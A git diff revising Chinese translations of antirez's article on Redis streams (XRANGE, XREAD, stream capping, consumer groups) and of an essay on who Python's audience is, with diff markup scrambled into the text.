在上面的示例中,也展示了无需指定任何初始<ruby>模式<rt>schema</rt></ruby>的情况下,对不同的条目使用不同的字段。会发生什么呢?就像前面提到的一样,只有每个块(它通常包含 50-150 个消息内容)的第一个消息被使用。并且,相同字段的连续条目都使用了一个标志进行了压缩,这个标志表示与“它们与这个块中的第一个条目的字段相同”。因此,使用相同字段的连续消息可以节省许多内存,即使是字段集随着时间发生缓慢变化的情况下也很节省内存。
|
||||||
> XRANGE mystream 1506871964177.0 1506871964177.0
|
|
||||||
1) 1) 1506871964177.0
|
|
||||||
2) 1) "sensor-id"
|
|
||||||
2) "1234"
|
|
||||||
3) "temperature"
|
|
||||||
4) "10.5"
|
|
||||||
```
|
|
||||||
|
|
||||||
然而,你可以使用指定的开始符号 `-` 和停止符号 `+` 去表示最小和最大的 ID。为了限制返回条目的数量,它也可以使用 `COUNT` 选项。下面是一个更复杂的 `XRANGE` 示例:
|
|
||||||
|
|
||||||
```
|
为了从流中检索数据,这里有两种方法:范围查询,它是通过 `XRANGE` 命令实现的;<ruby>流播<rt>streaming</rt></ruby>,它是通过 `XREAD` 命令实现的。`XRANGE` 命令仅取得包括从开始到停止范围内的全部条目。因此,举例来说,如果我知道它的 ID,我可以使用如下的命名取得单个条目:
|
||||||
> XRANGE mystream - + COUNT 2
|
|
||||||
1) 1) 1506871964177.0
|
|
||||||
2) 1) "sensor-id"
|
|
||||||
2) "1234"
|
|
||||||
3) "temperature"
|
|
||||||
4) "10.5"
|
|
||||||
2) 1) 1506872463535.0
|
|
||||||
2) 1) "foo"
|
|
||||||
2) "10"
|
|
||||||
```
|
|
||||||
|
|
||||||
这里我们讲的是 ID 的范围,然后,为了取得在一个给定时间范围内的特定范围的元素,你可以使用 `XRANGE`,因为你可以省略 ID 的“序列” 部分。因此,你可以做的仅是指定“毫秒”时间,下面的命令的意思是: “从 UNIX 时间 1506872463 开始给我 10 个条目”:
|
|
||||||
|
|
||||||
```
|
|
||||||
127.0.0.1:6379> XRANGE mystream 1506872463000 + COUNT 10
|
|
||||||
1) 1) 1506872463535.0
|
|
||||||
2) 1) "foo"
|
|
||||||
2) "10"
|
|
||||||
2) 1) 1506872463535.1
|
|
||||||
2) 1) "bar"
|
|
||||||
2) "20"
|
|
||||||
```
|
```
|
||||||
|
> XRANGE mystream 1506871964177.0 1506871964177.0
|
||||||
关于 `XRANGE` 最后一个重要的事情是,考虑到我们在回复中收到 ID,并且随后连续的 ID 只是增加了 ID 的序列部分,所以可以使用 `XRANGE` 去遍历整个流,接收每个调用的指定个数的元素。在 Redis 中的`*SCAN` 系列命令之后,它允许 Redis 数据结构迭代,尽管事实上它们不是为迭代设计的,但我避免再犯相同的错误。
|
1) 1) 1506871964177.0
|
||||||
|
2) 1) "sensor-id"
|
||||||
### 使用 XREAD 处理变化的流:阻塞新的数据
|
2) "1234"
|
||||||
|
3) "temperature"
|
||||||
当我们想通过 ID 或时间去访问流中的一个范围或者是通过 ID 去得到单个元素时,使用 XRANGE 是非常完美的。然而,在当数据到达时,流必须由不同的客户端处理时,它就不是一个很好的解决方案,它是需要某种形式的“池”。(对于*某些*应用程序来说,这可能是个好主意,因为它们仅是偶尔连接取数的)
|
4) "10.5"
|
||||||
|
```
|
||||||
`XREAD` 命令是为读设计的,同时从多个流中仅指定我们从该流中得到的最后条目的 ID。此外,如果没有数据可用,我们可以要求阻塞,当数据到达时,去解除阻塞。类似于阻塞列表操作产生的效果,但是,这里的数据是从流中得到的。并且多个客户端可以在同时访问相同的数据。
|
|
||||||
|
|
||||||
这里有一个关于 `XREAD` 调用的规范示例:
|
|
||||||
|
|
||||||
```
|
不管怎样,你都可以使用指定的开始符号 `-` 和停止符号 `+` 表示最小和最大的 ID。为了限制返回条目的数量,也可以使用 `COUNT` 选项。下面是一个更复杂的 `XRANGE` 示例:
|
||||||
> XREAD BLOCK 5000 STREAMS mystream otherstream $ $
|
|
||||||
```
|
|
||||||
|
|
||||||
它的意思是:从 `mystream` 和 `otherstream` 取得数据。如果没有数据可用,阻塞客户端 5000 毫秒。之后我们用关键字 `STREAMS` 指定我们想要监听的流,和我们的最后 ID,指定的 ID `$` 意思是:假设我现在已经有了流中的所有元素,因此,从下一个到达的元素开始给我。
|
|
||||||
|
|
||||||
如果,从另外一个客户端,我发出这样的命令:
|
|
||||||
|
|
||||||
```
|
|
||||||
> XADD otherstream * message “Hi There”
|
|
||||||
|
|
||||||
在 XREAD 侧会出现什么情况呢?
|
|
||||||
|
|
||||||
1) 1) "otherstream"
|
|
||||||
2) 1) 1) 1506935385635.0
|
|
||||||
2) 1) "message"
|
|
||||||
2) "Hi There"
|
|
||||||
```
|
```
|
||||||
|
> XRANGE mystream - + COUNT 2
|
||||||
和收到的数据一起,我们得到了最新收到的数据的 key,在下次的调用中,我们将使用接收到的最新消息的 ID:
|
1) 1) 1506871964177.0
|
||||||
|
2) 1) "sensor-id"
|
||||||
|
2) "1234"
|
||||||
|
3) "temperature"
|
||||||
|
4) "10.5"
|
||||||
|
2) 1) 1506872463535.0
|
||||||
|
2) 1) "foo"
|
||||||
|
2) "10"
|
||||||
|
```
|
||||||
|
|
||||||
```
|
这里我们讲的是 ID 的范围,然后,为了取得在一个给定时间范围内的特定范围的元素,你可以使用 `XRANGE`,因为 ID 的“序号” 部分可以省略。因此,你可以只指定“毫秒”时间即可,下面的命令的意思是:“从 UNIX 时间 1506872463 开始给我 10 个条目”:
|
||||||
> XREAD BLOCK 5000 STREAMS mystream otherstream $ 1506935385635.0
|
|
||||||
```
|
|
||||||
|
|
||||||
依次类推。然而需要注意的是使用方式,有可能客户端在一个非常大的延迟(因为它处理消息需要时间,或者其它什么原因)之后再次连接。在这种情况下,期间会有很多消息堆积,为了确保客户端不被消息淹没,并且服务器不会花费太多时间提供给单个客户端的大量消息,所以,总是使用 `XREAD` 的 `COUNT` 选项是明智的。
|
|
||||||
|
|
||||||
### 流封顶
|
|
||||||
|
|
||||||
到现在为止,一直还都不错…… 然而,有些时候,流需要去删除一些旧的消息。幸运的是,这可以使用 `XADD` 命令的 `MAXLEN` 选项去做:
|
|
||||||
|
|
||||||
```
|
|
||||||
> XADD mystream MAXLEN 1000000 * field1 value1 field2 value2
|
|
||||||
```
|
```
|
||||||
|
127.0.0.1:6379> XRANGE mystream 1506872463000 + COUNT 10
|
||||||
它是基本意思是,如果流添加的新元素被发现超过 `1000000` 个消息,那么,删除旧的消息,以便于长度回到 `1000000` 个元素以内。它很像是使用 `RPUSH` + `LTRIM` 的列表,但是,这是我们使用了一个内置机制去完成的。然而,需要注意的是,上面的意思是每次我们增加一个新的消息时,我们还需要另外的工作去从流中删除旧的消息。这将使用一些 CPU 资源,所以,在计算 MAXLEN 的之前,尽可能使用 `~` 符号,为了表明我们不是要求非常*精确*的 1000000 个消息,而是稍微多一些也不是一个大的问题:
|
1) 1) 1506872463535.0
|
||||||
|
2) 1) "foo"
|
||||||
|
2) "10"
|
||||||
|
2) 1) 1506872463535.1
|
||||||
|
2) 1) "bar"
|
||||||
|
2) "20"
|
||||||
|
```
|
||||||
|
|
||||||
|
关于 `XRANGE` 需要注意的最重要的事情是,假设我们在回复中收到 ID,随后连续的 ID 只是增加了序号部分,所以可以使用 `XRANGE` 遍历整个流,接收每个调用的指定个数的元素。Redis 中的`*SCAN` 系列命令允许迭代 Redis 数据结构,尽管事实上它们不是为迭代设计的,但这样可以避免再犯相同的错误。
|
||||||
|
|
||||||
|
### 使用 XREAD 处理流播:阻塞新的数据
|
||||||
|
|
||||||
|
当我们想通过 ID 或时间去访问流中的一个范围或者是通过 ID 去获取单个元素时,使用 `XRANGE` 是非常完美的。然而,在使用流的案例中,当数据到达时,它必须由不同的客户端来消费时,这就不是一个很好的解决方案,这需要某种形式的<ruby>汇聚池<rt>pooling</rt></ruby>。(对于 *某些* 应用程序来说,这可能是个好主意,因为它们仅是偶尔连接查询的)
|
||||||
|
|
||||||
|
`XREAD` 命令是为读取设计的,在同一个时间,从多个流中仅指定我们从该流中得到的最后条目的 ID。此外,如果没有数据可用,我们可以要求阻塞,当数据到达时,就解除阻塞。类似于阻塞列表操作产生的效果,但是这里并没有消费从流中得到的数据,并且多个客户端可以同时访问同一份数据。
|
||||||
|
|
||||||
|
这里有一个典型的 `XREAD` 调用示例:
|
||||||
|
|
||||||
```
|
|
||||||
> XADD mystream MAXLEN ~ 1000000 * foo bar
|
|
||||||
```
|
```
|
||||||
|
> XREAD BLOCK 5000 STREAMS mystream otherstream $ $
|
||||||
这种方式 XADD 仅当它可以删除整个节点的时候才会删除元素。相比普通的 `XADD`,这种方式几乎可以自由地对流进行封顶。
|
```
|
||||||
|
|
||||||
### 消费组(开发中)
|
它的意思是:从 `mystream` 和 `otherstream` 取得数据。如果没有数据可用,阻塞客户端 5000 毫秒。在 `STREAMS` 选项之后指定我们想要监听的关键字,最后的是指定想要监听的 ID,指定的 ID 为 `$` 的意思是:假设我现在需要流中的所有元素,因此,只需要从下一个到达的元素开始给我。
|
||||||
|
|
||||||
这是第一个 Redis 中尚未实现而在开发中的特性。它也是来自 Kafka 的灵感,尽管在这里以不同的方式去实现的。重点是使用了 `XREAD`,客户端也可以增加一个 `GROUP <name>` 选项。 在相同组的所有客户端自动调用,以得到*不同的*消息。当然,不能从同一个流中被多个组读。在这种情况下,所有的组将收到流中到达的消息的相同副本。但是,在每个组内,消息是不会重复的。
|
如果我从另一个客户端发送这样的命令:
|
||||||
|
|
||||||
当指定组时,能够指定一个 “RETRY <milliseconds>” 选项去扩展组:在这种情况下,如果消息没有使用 XACK 去进行确认,它将在指定的毫秒数后进行再次投递。这将为消息投递提供更佳的可靠性,这种情况下,客户端没有私有的方法去标记已处理的消息。这也是一项正在进行中的工作。
|
```
|
||||||
|
> XADD otherstream * message “Hi There”
|
||||||
### 内存使用和节省的加载时间
|
```
|
||||||
|
|
||||||
因为被设计用来模拟 Redis 流,内存使用是显著降低的。这依赖于它们的域的数量、值和长度,但对于简单的消息,每 100 MB 内存使用可以有几百万条消息,此外,设想中的格式去需要极少的系列化:listpack 块以 radix 树节点方式存储,在磁盘上和内存中是以相同方式表示的,因此,它们可以被轻松地存储和读取。在一个实例中,Redis 能在 0.3 秒内可以从 RDB 文件中读取 500 万个条目。这使的流的复制和持久存储是非常高效的。
|
在 `XREAD` 侧会出现什么情况呢?
|
||||||
|
|
||||||
也计划允许从条目中间删除。现在仅部分实现,策略是删除的条目在标记中标识为已删除条目,并且,当达到已删除条目占全部条目的给定比例时,这个块将被回收重写,并且,如果需要,它将被连到相邻的另一个块上,以避免碎片化。
|
```
|
||||||
|
1) 1) "otherstream"
|
||||||
### 最终发布时间的结论
|
2) 1) 1) 1506935385635.0
|
||||||
|
2) 1) "message"
|
||||||
Redis 流将包含在年底前(LCTT 译注:本文原文发布于 2017 年 10 月)推出的 Redis 4.0 系列的稳定版中。我认为这个通用的数据结构将为 Redis 提供一个巨大的补丁,以用于解决很多现在很难去解决的情况:那意味着你(之前)需要创造性地滥用当前提供的数据结构去解决那些问题。一个非常重要的使用情况是时间系列,但是,我的感觉是,对于其它用例来说,通过 `TREAD` 来传递消息将是非常有趣的,因为它可以替代那些需要更高可靠性的发布/订阅的应用程序,而不是“即用即弃”,以及全新的用例。现在,如果你想在你需要的环境中评估新的数据结构的能力,可以在 GitHub 上去获得 “streams” 分支,开始去玩吧。欢迎向我们报告所有的 bug 。 :-)
|
2) "Hi There"
|
||||||
|
```
|
||||||
如果你喜欢这个视频,展示这个 streams 的实时会话在这里: https://www.youtube.com/watch?v=ELDzy9lCFHQ
|
|
||||||
|
与收到的数据一起,我们也得到了数据的关键字。在下次调用中,我们将使用接收到的最新消息的 ID:
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
```
|
||||||
|
> XREAD BLOCK 5000 STREAMS mystream otherstream $ 1506935385635.0
|
||||||
via: http://antirez.com/news/114
|
```
|
||||||
|
|
||||||
作者:[antirez][a]
|
依次类推。然而需要注意的是使用方式,客户端有可能在一个非常大的延迟之后再次连接(因为它处理消息需要时间,或者其它什么原因)。在这种情况下,期间会有很多消息堆积,为了确保客户端不被消息淹没,以及服务器不会因为给单个客户端提供大量消息而浪费太多的时间,使用 `XREAD` 的 `COUNT` 选项是非常明智的。
|
||||||
译者:[qhwdw](https://github.com/qhwdw)
|
|
||||||
校对:[wxy](https://github.com/wxy)
|
### 流封顶
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
目前看起来还不错……然而,有些时候,流需要删除一些旧的消息。幸运的是,这可以使用 `XADD` 命令的 `MAXLEN` 选项去做:
|
||||||
|
|
||||||
[a]:http://antirez.com/
|
```
|
||||||
[1]:http://antirez.com/news/114
|
> XADD mystream MAXLEN 1000000 * field1 value1 field2 value2
|
||||||
[2]:http://antirez.com/user/antirez
|
```
|
||||||
[3]:https://www.youtube.com/watch?v=ELDzy9lCFHQ
|
|
||||||
|
它是基本意思是,如果在流中添加新元素后发现消息数量超过了 `1000000` 个,那么就删除旧的消息,以便于元素总量重新回到 `1000000` 以内。它很像是在列表中使用的 `RPUSH` + `LTRIM`,但是,这次我们是使用了一个内置机制去完成的。然而,需要注意的是,上面的意思是每次我们增加一个新的消息时,我们还需要另外的工作去从流中删除旧的消息。这将消耗一些 CPU 资源,所以在计算 `MAXLEN` 之前,尽可能使用 `~` 符号,以表明我们不要求非常 *精确* 的 1000000 个消息,就是稍微多一些也不是大问题:
|
||||||
|
|
||||||
|
```
|
||||||
|
> XADD mystream MAXLEN ~ 1000000 * foo bar
|
||||||
|
```
|
||||||
|
|
||||||
|
这种方式的 XADD 仅当它可以删除整个节点的时候才会删除消息。相比普通的 `XADD`,这种方式几乎可以自由地对流进行封顶。
|
||||||
|
|
||||||
|
### 消费组(开发中)
|
||||||
|
|
||||||
|
这是第一个 Redis 中尚未实现而在开发中的特性。灵感也是来自 Kafka,尽管在这里是以不同的方式实现的。重点是使用了 `XREAD`,客户端也可以增加一个 `GROUP <name>` 选项。相同组的所有客户端将自动得到 *不同的* 消息。当然,同一个流可以被多个组读取。在这种情况下,所有的组将收到流中到达的消息的相同副本。但是,在每个组内,消息是不会重复的。
|
||||||
|
|
||||||
|
当指定组时,能够指定一个 `RETRY <milliseconds>` 选项去扩展组:在这种情况下,如果消息没有通过 `XACK` 进行确认,它将在指定的毫秒数后进行再次投递。这将为消息投递提供更佳的可靠性,这种情况下,客户端没有私有的方法将消息标记为已处理。这一部分也正在开发中。
|
||||||
|
|
||||||
|
### 内存使用和节省加载时间
|
||||||
|
|
||||||
|
因为用来建模 Redis 流的设计,内存使用率是非常低的。这取决于它们的字段、值的数量和长度,对于简单的消息,每使用 100MB 内存可以有几百万条消息。此外,格式设想为需要极少的序列化:listpack 块以 radix 树节点方式存储,在磁盘上和内存中都以相同方式表示的,因此它们可以很轻松地存储和读取。例如,Redis 可以在 0.3 秒内从 RDB 文件中读取 500 万个条目。这使流的复制和持久存储非常高效。
|
||||||
|
|
||||||
|
我还计划允许从条目中间进行部分删除。现在仅实现了一部分,策略是在条目在标记中标识条目为已删除,并且,当已删除条目占全部条目的比例达到指定值时,这个块将被回收重写,如果需要,它将被连到相邻的另一个块上,以避免碎片化。
|
||||||
|
|
||||||
|
### 关于最终发布时间的结论
|
||||||
|
|
||||||
|
Redis 的流特性将包含在年底前(LCTT 译注:本文原文发布于 2017 年 10 月)推出的 Redis 4.0 系列的稳定版中。我认为这个通用的数据结构将为 Redis 提供一个巨大的补丁,以用于解决很多现在很难以解决的情况:那意味着你(之前)需要创造性地“滥用”当前提供的数据结构去解决那些问题。一个非常重要的使用场景是时间序列,但是,我觉得对于其它场景来说,通过 `TREAD` 来流播消息将是非常有趣的,因为对于那些需要更高可靠性的应用程序,可以使用发布/订阅模式来替换“即用即弃”,还有其它全新的使用场景。现在,如果你想在有问题环境中评估这个新数据结构,可以更新 GitHub 上的 streams 分支开始试用。欢迎向我们报告所有的 bug。:-)
|
||||||
|
|
||||||
|
如果你喜欢观看视频的方式,这里有一个现场演示:https://www.youtube.com/watch?v=ELDzy9lCFHQ
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
via: http://antirez.com/news/114
|
||||||
|
|
||||||
|
作者:[antirez][a]
|
||||||
|
译者:[qhwdw](https://github.com/qhwdw)
|
||||||
|
校对:[wxy](https://github.com/wxy)、[pityonline](https://github.com/pityonline)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]: http://antirez.com/
|
||||||
|
[1]: https://zh.wikipedia.org/wiki/CAP%E5%AE%9A%E7%90%86
|
||||||
|
@ -1,78 +1,78 @@
|
|||||||
谁是 Python 的目标受众?
|
盘点 Python 的目标受众
|
||||||
============================================================
|
============================================================
|
||||||
|
|
||||||
Python 是为谁设计的?
|
Python 是为谁设计的?
|
||||||
|
|
||||||
* [Python 使用情况的参考][8]
|
* [Python 的参考解析器使用情况][8]
|
||||||
* [CPython 主要服务于哪些受众?][9]
|
* [CPython 主要服务于哪些受众?][9]
|
||||||
* [这些相关问题的原因是什么?][10]
|
* [这些相关问题的原因是什么?][10]
|
||||||
* [适合进入 PyPI 规划的方面有哪些?][11]
|
* [适合进入 PyPI 规划的方面有哪些?][11]
|
||||||
* [当增加它到标准库中时,为什么一些 API 会被改变?][12]
|
* [当添加它们到标准库中时,为什么一些 API 会被改变?][12]
|
||||||
* [为什么一些 API 是以<ruby>临时<rt>provisional</rt></ruby>的形式被增加的?][13]
|
* [为什么一些 API 是以<ruby>临时<rt>provisional</rt></ruby>的形式被添加的?][13]
|
||||||
* [为什么只有一些标准库 API 被升级?][14]
|
* [为什么只有一些标准库 API 被升级?][14]
|
||||||
* [标准库任何部分都有独立的版本吗?][15]
|
* [标准库任何部分都有独立的版本吗?][15]
|
||||||
* [这些注意事项为什么很重要?][16]
|
* [这些注意事项为什么很重要?][16]
|
||||||
|
|
||||||
几年前, 我在 python-dev 邮件列表里面、活跃的 CPython 核心开发人员、以及决定参与该过程的人员中[强调][38]说,“CPython 的动作太快了也太慢了”,作为这种冲突的一个主要原因是,他们不能有效地使用他们的个人时间和精力。
|
几年前,我在 python-dev 邮件列表中,以及在活跃的 CPython 核心开发人员和认为参与这一过程不是有效利用他们个人时间和精力的人中[强调][38]说,“CPython 的发展太快了也太慢了”是很多冲突的原因之一。
|
||||||
|
|
||||||
我一直在考虑这种情况,在参与的这几年,我也花费了一些时间去思考这一点,在我写那篇文章的时候,我还在<ruby>波音防务澳大利亚公司<rt>Boeing Defence Australia</rt></ruby>工作。下个月,我将离开波音进入<ruby>红帽亚太<rt>Red Hat Asia-Pacific</rt></ruby>,并且开始在大企业的[开源供应链管理][39]上形成<ruby>再分发者<rt>redistributor</rt></ruby>层面的观点。
|
我一直认为事实确实如此,但这也是一个要点,在这几年中我也花费了一些时间去反思它。在我写那篇文章的时候,我还在<ruby>波音防务澳大利亚公司<rt>Boeing Defence Australia</rt></ruby>工作。下个月,我将离开波音进入<ruby>红帽亚太<rt>Red Hat Asia-Pacific</rt></ruby>,并且开始在大企业的[开源供应链管理][39]上获得<ruby>再分发者<rt>redistributor</rt></ruby>层面的视角。
|
||||||
|
|
||||||
### Python 使用情况的参考
|
### Python 的参考解析器使用情况
|
||||||
|
|
||||||
我尝试将 CPython 的使用情况分解如下,它虽然有些过于简化(注意,这些分类并不是很清晰,他们仅关注影响新软件特性和版本的部署不同因素):
|
我尝试将 CPython 的使用情况分解如下,它虽然有些过于简化(注意,这些分类的界线并不是很清晰,他们仅关注于思考新软件特性和版本发布后不同因素的影响):
|
||||||
|
|
||||||
* 教育类:教育工作者的主要兴趣在于建模方法的教学和计算操作方面,_不会去_ 写或维护软件产品。例如:
|
* 教育类:教育工作者的主要兴趣在于建模方法的教学和计算操作方面,_不会去_ 写或维护生产级别的软件。例如:
|
||||||
* 澳大利亚的 [数字课程][1]
|
* 澳大利亚的 [数字课程][1]
|
||||||
* Lorena A. Barba 的 [AeroPython][2]
|
* Lorena A. Barba 的 [AeroPython][2]
|
||||||
* 个人的自动化爱好者的项目:主要的是软件,经常是只有软件,而且用户通常是写它的人。例如:
|
* 个人级的自动化和爱好者的项目:主要的是软件,而且经常是只有软件,用户通常是写它的人。例如:
|
||||||
* my Digital Blasphemy [image download notebook][3]
|
* my Digital Blasphemy [图片下载器][3]
|
||||||
* Paul Fenwick 的 (Inter)National [Rick Astley Hotline][4]
|
* Paul Fenwick 的 (Inter)National [Rick Astley Hotline][4]
|
||||||
* <ruby>组织<rt>organisational</rt></ruby>过程的自动化:主要是软件,经常是只有软件,用户是为了利益而编写它的组织。例如:
|
* <ruby>组织<rt>organisational</rt></ruby>过程自动化:主要是软件,而且经常是只有软件,用户是为了利益而编写它的组织。例如:
|
||||||
* CPython 的 [核心开发工作流工具][5]
|
* CPython 的 [核心工作流工具][5]
|
||||||
* Linux 发行版的开发、构建 & 发行工具
|
* Linux 发行版的开发、构建 & 发行管理工具
|
||||||
* “<ruby>一劳永逸<rt>Set-and-forget</rt></ruby>” 的基础设施中:这里是软件,(这种说法有时候有些争议),在生命周期中该软件几乎不会升级,但是,在底层平台可能会升级。例如:
|
* “<ruby>一劳永逸<rt>Set-and-forget</rt></ruby>” 的基础设施中:这里是软件,(这种说法有时候有些争议),在生命周期中该软件几乎不会升级,但是,在底层平台可能会升级。例如:
|
||||||
* 大多数的自我管理的企业或机构的基础设施(在那些资金充足的可持续工程计划中,这是让人非常不安的)
|
* 大多数的自我管理的企业或机构的基础设施(在那些资金充足的可持续工程计划中,这种情况是让人非常不安的)
|
||||||
* 拨款资助的软件(当最初的拨款耗尽时,维护通常会终止)
|
* 拨款资助的软件(当最初的拨款耗尽时,维护通常会终止)
|
||||||
* 有严格认证要求的软件(如果没有绝对必要的话,从经济性考虑,重新认证比常规更新来说要昂贵很多)
|
* 有严格认证要求的软件(如果没有绝对必要的话,从经济性考虑,重新认证比常规更新来说要昂贵很多)
|
||||||
* 没有自动升级功能的嵌入式软件系统
|
* 没有自动升级功能的嵌入式软件系统
|
||||||
* 持续升级的基础设施:具有健壮的持续工程化模型的软件,对于依赖和平台升级被认为是例行的,而不去关心其它的代码改变。例如:
|
* 持续升级的基础设施:具有健壮支撑的工程学模型的软件,对于依赖和平台升级通常是例行的,而不去关心其它的代码改变。例如:
|
||||||
* Facebook 的 Python 服务基础设施
|
* Facebook 的 Python 服务基础设施
|
||||||
* 滚动发布的 Linux 分发版
|
* 滚动发布的 Linux 分发版
|
||||||
* 大多数的公共 PaaS 无服务器环境(Heroku、OpenShift、AWS Lambda、Google Cloud Functions、Azure Cloud Functions等等)
|
* 大多数的公共 PaaS 无服务器环境(Heroku、OpenShift、AWS Lambda、Google Cloud Functions、Azure Cloud Functions等等)
|
||||||
* 间歇性升级的标准的操作环境:对其核心组件进行常规升级,但这些升级以年为单位进行,而不是周或月。例如:
|
* 间隔性升级的标准的操作环境:对其核心组件进行常规升级,但这些升级以年为单位进行,而不是周或月。例如:
|
||||||
* [VFX 平台][6]
|
* [VFX 平台][6]
|
||||||
* 长周期支持的 Linux 分发版
|
* 长周期支持的 Linux 分发版
|
||||||
* CPython 和 Python 标准库
|
* CPython 和 Python 标准库
|
||||||
* 基础设施管理 & 业务流程工具(比如 OpenStack、 Ansible)
|
* 基础设施管理 & 编排工具(比如 OpenStack、 Ansible)
|
||||||
* 硬件控制系统
|
* 硬件控制系统
|
||||||
* 短生命周期的软件:软件仅被使用一次,然后就丢弃或忽略,而不是随后接着升级。例如:
|
* 短生命周期的软件:软件仅被使用一次,然后就丢弃或忽略,而不是随后接着升级。例如:
|
||||||
* <ruby>临时<rt>Ad hoc</rt></ruby>自动脚本
|
* <ruby>临时<rt>Ad hoc</rt></ruby>自动脚本
|
||||||
* 被确定为 “终止” 的单用户游戏(你玩它们一次后,甚至都忘了去卸载它,或许在一个新的设备上都不打算再去安装它)
|
* 被确定为 “终止” 的单用户游戏(你玩它们一次后,甚至都忘了去卸载它,或许在一个新的设备上都不打算再去安装它)
|
||||||
* 短暂的或非持久状态的单用户游戏(如果你卸载并重安装它们,你的游戏体验也不会有什么大的变化)
|
* 短暂的或非持久状态的单用户游戏(如果你卸载并重安装它们,你的游戏体验也不会有什么大的变化)
|
||||||
* 特定事件的应用程序(这些应用程序与特定的物理事件捆绑,一旦事件结束,这些应用程序就不再有用了)
|
* 特定事件的应用程序(这些应用程序与特定的物理事件捆绑,一旦事件结束,这些应用程序就不再有用了)
|
||||||
* 定期使用的应用程序:部署后定期升级的软件。例如:
|
* 频繁使用的应用程序:部署后定期升级的软件。例如:
|
||||||
* 业务管理软件
|
* 业务管理软件
|
||||||
* 个人 & 专业的生产力应用程序(比如,Blender)
|
* 个人 & 专业的生产力应用程序(比如,Blender)
|
||||||
* 开发工具 & 服务(比如,Mercurial、 Buildbot、 Roundup)
|
* 开发工具 & 服务(比如,Mercurial、 Buildbot、 Roundup)
|
||||||
* 多用户游戏,和其它明显的处于持续状态的还没有被定义为 “终止” 的游戏
|
* 多用户游戏,和其它明显的处于持续状态的还没有被定义为 “终止” 的游戏
|
||||||
* 有自动升级功能的嵌入式软件系统
|
* 有自动升级功能的嵌入式软件系统
|
||||||
* 共享的抽象层:软件组件的设计使它能够在特定的问题域有效地工作,即使你没有亲自掌握该领域的所有错综复杂的东西。例如:
|
* 共享的抽象层:在一个特定的问题领域中,设计用于让工作更高效的软件组件。即便是你没有亲自掌握该领域的所有错综复杂的东西。例如:
|
||||||
* 大多数的运行时库和归入这一类的框架(比如,Django、Flask、Pyramid、SQL Alchemy、NumPy、SciPy、requests)
|
* 大多数的运行时库和归入这一类的框架(比如,Django、Flask、Pyramid、SQL Alchemy、NumPy、SciPy、requests)
|
||||||
* 也适合归入这里的许多测试和类型引用工具(比如,pytest、Hypothesis、vcrpy、behave、mypy)
|
* 适合归入这一类的许多测试和类型推断工具(比如,pytest、Hypothesis、vcrpy、behave、mypy)
|
||||||
* 其它应用程序的插件(比如,Blender plugins、OpenStack hardware adapters)
|
* 其它应用程序的插件(比如,Blender plugins、OpenStack hardware adapters)
|
||||||
* 本身就代表了 “Python 世界” 的基准的标准库(那是一个 [难以置信的复杂][7] 的世界观)
|
* 本身就代表了 “Python 世界” 基准的标准库(那是一个 [难以置信的复杂][7] 的世界观)
|
||||||
|
|
||||||
### CPython 主要服务于哪些受众?
|
### CPython 主要服务于哪些受众?
|
||||||
|
|
||||||
最终,CPython 和标准库的主要受众是哪些,不论什么原因,比较有限的标准库和从 PyPI 安装的显式声明的第三方库的组合,所提供的服务是不够的。
|
从根本上说,CPython 和标准库的主要受众是哪些呢,是那些不管出于什么原因,将有限的标准库和从 PyPI 显式声明安装的第三方库组合起来所提供的服务,还不能够满足需求的那些人。
|
||||||
|
|
||||||
为了更进一步简化上面回顾的不同用法和部署模式,尽可能的总结,将最大的 Python 用户群体分开来看,一种是,在一些环境中将 Python 作为一种_脚本语言_使用的;另外一种是将它用作一个_应用程序开发语言_,最终发布的是一种产品而不是他们的脚本。
|
为了更进一步简化上面回顾的不同用法和部署模型,尽可能的总结,将最大的 Python 用户群体分开来看,一种是,在一些感兴趣的环境中将 Python 作为一种_脚本语言_使用的那些人;另外一种是将它用作一个_应用程序开发语言_的那些人,他们最终发布的是一种产品而不是他们的脚本。
|
||||||
|
|
||||||
当把 Python 作为一种脚本语言来使用时,它们典型的开发者特性包括:
|
把 Python 作为一种脚本语言来使用的开发者的典型特性包括:
|
||||||
|
|
||||||
* 主要的处理单元是由一个 Python 文件组成的(或 Jupyter notebook !),而不是一个 Python 目录和元数据文件
|
* 主要的工作单元是由一个 Python 文件组成的(或 Jupyter notebook !),而不是一个 Python 和元数据文件的目录
|
||||||
* 没有任何形式的单独的构建步骤 —— 是_作为_一个脚本分发的,类似于分发一个单独的 shell 脚本的方法
|
* 没有任何形式的单独的构建步骤 —— 是_作为_一个脚本分发的,类似于分发一个独立的 shell 脚本的方式
|
||||||
* 没有单独的安装步骤(除了下载这个文件到一个合适的位置),除了在目标系统上要求预配置运行时环境
|
* 没有单独的安装步骤(除了下载这个文件到一个合适的位置),除了在目标系统上要求预配置运行时环境外
|
||||||
* 没有显式的规定依赖关系,除了最低的 Python 版本,或一个预期的运行环境声明。如果需要一个标准库以外的依赖项,他们会通过一个环境脚本去提供(无论是操作系统、数据分析平台、还是嵌入 Python 运行时的应用程序)
|
* 没有显式的规定依赖关系,除了最低的 Python 版本,或一个预期的运行环境声明。如果需要一个标准库以外的依赖项,他们会通过一个环境脚本去提供(无论是操作系统、数据分析平台、还是嵌入 Python 运行时的应用程序)
|
||||||
* 没有单独的测试套件,使用“通过你给定的输入,这个脚本是否给出了你期望的结果?” 这种方式来进行测试
|
* 没有单独的测试套件,使用“通过你给定的输入,这个脚本是否给出了你期望的结果?” 这种方式来进行测试
|
||||||
* 如果在执行前需要测试,它将以 “试运行” 和 “预览” 模式来向用户展示软件_将_怎样运行
|
* 如果在执行前需要测试,它将以 “试运行” 和 “预览” 模式来向用户展示软件_将_怎样运行
|
||||||
@ -80,79 +80,79 @@ Python 是为谁设计的?
|
|||||||
|
|
||||||
相比之下,使用 Python 作为一个应用程序开发语言的开发者特征包括:
|
相比之下,使用 Python 作为一个应用程序开发语言的开发者特征包括:
|
||||||
|
|
||||||
* 主要的工作单元是由 Python 的目录和元数据文件组成的,而不是单个 Python 文件
|
* 主要的工作单元是由 Python 和元数据文件组成的目录,而不是单个 Python 文件
|
||||||
* 在发布之前有一个单独的构建步骤去预处理应用程序,即使是把它的这些文件一起打包进一个 Python sdist、wheel 或 zipapp 文档
|
